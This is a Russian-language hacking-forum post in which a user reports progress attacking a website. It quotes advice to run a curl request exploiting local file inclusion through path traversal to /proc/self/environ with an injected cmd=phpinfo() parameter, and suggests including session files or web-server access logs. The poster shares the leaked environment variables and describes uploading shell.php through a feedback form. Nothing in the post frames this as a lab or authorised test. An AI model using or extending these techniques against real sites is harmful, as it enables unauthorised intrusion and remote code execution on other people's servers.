Показать сообщение отдельно

  #10  
Старый 26.10.2016, 10:31
GTAlex
Новичок
Регистрация: 07.09.2009
Сообщений: 1
С нами: 8777319

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0ma5  

тс php файлы не читаются? может быть инклуд? попробуй
curl '
http://site.com/page=../../../../../../../../proc/self/environ&cmd=phpinfo();
' -H 'User-Agent: '
аналогично можно попробовать проинклудить сессию или access логи apache/nginx
Такой вот ответ на инклуд дал:

PHPRC=/home/u21370/etc/php

PATH=/usr/local/bin:/usr/bin:/bin

PWD=/usr/lib/cgi-bin

LANG=ru_RU.UTF-8

SHLVL=0

PHP_FCGI_MAX_REQUESTS=3000​

Регнулся я на этом же хостинге, чтобы понять структуру файлов - в итоге у меня есть логи вебсервера! пока тоже не знаю что с ними делать

Так же обнаружил возможность загрузить файл через форму обратной связи - на загрузку shell.php даже не рунгулся - сообщение принято! но блин, где он лежит (если вообще лежит) - непонятно

P.S. Спасибо за советы!
 
Ответить с цитированием